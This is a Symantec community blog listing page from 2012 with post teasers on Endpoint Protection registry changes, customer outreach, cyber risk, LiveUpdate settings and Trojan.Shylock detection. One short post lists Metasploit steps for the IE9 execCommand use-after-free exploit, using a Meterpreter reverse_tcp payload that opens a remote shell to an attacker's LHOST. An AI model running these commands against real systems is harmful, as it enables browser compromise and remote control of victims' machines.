Video Screencast Help
Security Community Blog
Showing posts tagged with Endpoint Protection (AntiVirus)
Showing posts in English
Mithun Sanghavi | 06 Nov 2012 | 0 comments


To provide better support for a set of registry keys that are commonly used for client monitoring, the following subkeys have been moved in Symantec Endpoint Protection version 12.1.1100. If you run custom scripts against the Symantec Endpoint Protection registry, or if you have written a remote monitoring solution for an earlier release, you will need to revise them when you upgrade to this release.

All new registry subkeys are placed in the following location:HKLM\SOFTWARE\Symantec\Symantec Endpoint Protection\CurrentVersion\Public-Opstate.

Note: This list includes only registry subkeys that were moved in this release. New subkeys are documented elsewhere.

Warning: All registry subkeys and values for Symantec Endpoint Protection should be treated as read-only.



Symantec Corp. | 29 Oct 2012 | 0 comments

The Symantec Endpoint Protection and Mobility Group (EMG) has taken the goal of listening to “the voice of the customer” to a whole new level. This case study explains how EMG implemented an Outreach program that centers on talking to survey respondents. The details and personal insights they discover by speaking directly to customers allow them to make substantial improvements in the product and customer experience.

Surveys provide excellent feedback from customers, but nothing beats talking one-on-one to the people who use your product. “Every quarter we conduct a customer survey,” said Andrew Pendray, Director of Product Management for Pricing, Licensing and Analytics for the Endpoint Protection and Mobility Group (EMG), which includes Symantec Endpoint Protection (SEP) and other core security products. “Once the survey closes, we carefully analyze the numeric results. While that information is extremely helpful, the respondents...

James Hanlon | 15 Oct 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hackitivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increased in web based attacks and an increased focus and intensity of advanced persistent malware. Furthermore, Symantec...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments

Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.

When selecting a new service they have either gone to tender or bought an off the shelf solution upon recommendation from colleagues/friends. 

Whilst this may seem great at first, over the years this has built up a number of systems each requiring their own management systems, portals, update systems and most importantly, they lack integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks. 

One example from a customer who had one product that is designed to AV scan contents of a USB pen drive upon connection to the machine. Another product to encrypt USB pen drives upon connection. This is great if the admin could enforce this order, but what was actually happening is...

Eileen | 02 Oct 2012 | 0 comments

In this video, Sergei Tomlin, IT Director at Blackfoot Medical Center, discusses how his organization is using Symantec Endpoint Protection and Symantec Backup Exec. Some benefits highlighted are the ability to backup both physical and virtual environments and the ability to manage and control applicationsdeployed in their environment. Check out Blackfoot Medical Center’s whole story in this video



Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2


- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.


Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.

File-Based Protection (Traditional Antivirus)more info

Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
Brandon Noble | 23 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot of additional functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name of the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior of for threats, as noted in this blog article from May 2012,...

ABN | 22 Aug 2012 | 1 comment

Hello Gents,

We normally do come across the scenario of Live update affecting our ususal work of, being a Symantec administrator. Scenarios like

  1. Clients do not have the ability to launch liveupate even though policy is been set to do so. Or vice versa.
  1. Low disk space causing SEP not to update on critical serves. Definition is stored only on the OS drive were space is a major concern.

By default the SEP definitions will be stored in the Operating System drive even if we install it in a different partition.

With the following process we can configure the Liveupdate settings, the number of revision that is kept on the SEP (client) and also change the location on where it is stored.

I )   To enable Liveupdate on the SEP.

    From SEPM: